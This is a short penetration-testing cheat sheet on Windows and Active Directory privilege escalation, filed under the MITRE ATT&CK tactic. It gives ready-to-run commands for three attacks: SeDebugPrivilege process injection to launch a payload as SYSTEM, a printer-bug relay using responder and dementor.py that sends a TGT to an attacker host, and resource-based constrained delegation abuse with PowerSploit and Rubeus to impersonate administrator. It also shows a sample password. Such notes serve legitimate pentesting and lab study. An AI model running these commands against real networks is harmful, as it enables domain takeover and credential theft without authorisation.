Privilege Escalation

The adversary is trying to gain higher-level permissions. https://attack.mitre.org/tactics/TA0004/

Process Elevation (via SeDebugPrivilege)

If you run whoami /priv and you see SeDebugPrivilege set to Enabled, you can assume you already have SYSTEM. One way of doing it, is using decoder's psgetsys.ps1 script once you have a good idea on a PID to inject:

. .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(7864, 'C:\temp\payload.exe');

You can also gain a MSF session and use the module windows/manage/payload_inject with a PID of your choice.

Attacking spoolss ("The Printer Bug")

From a host with unconstrained delegation, "the printer bug" and dementor.py can be used to cause a TGT relay from the target host to us running responder, so we can generate a TGS for any user on that target host:

## set up a relay with responder:
responder -I tun0 --lm # tun0 = 10.10.15.123

## execute exploit through:
proxychains python dementor.py -u xsvc -p 'S3cur3PW123' -d 'burmat.local' 10.10.15.123 10.10.10.123

GenericWrite to Host + User SPN = PWN

If we have GenericWrite privileges over a host and we are a user that has an SPN, we can write our SID to the msDS-AllowedToActOnBehalfOfOtherIdentity property against the AD object user PowerSploit and forge tickets as anyone we like. You can read more about it here: https://alsid.com/company/news/kerberos-resource-based-constrained-delegation-new-control-path

## we can write our delegation attribute to the DC with the following:
$UserSid = Get-DomainUser svc_burmat -Properties objectsid | Select -Expand objectsid;
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($UserSid))";
$SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);
Get-DomainComputer websrv.burmat.local | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes};

## use rubeus to forge tickets as administrator accounts
rubeus.exe s4u /user:svc_burmat /ticket:doIFFDCCBRCg..SNIP.. /impersonateuser:administrator /msdsspn:cifs/websvr.burmat.local /ptt;

Last updated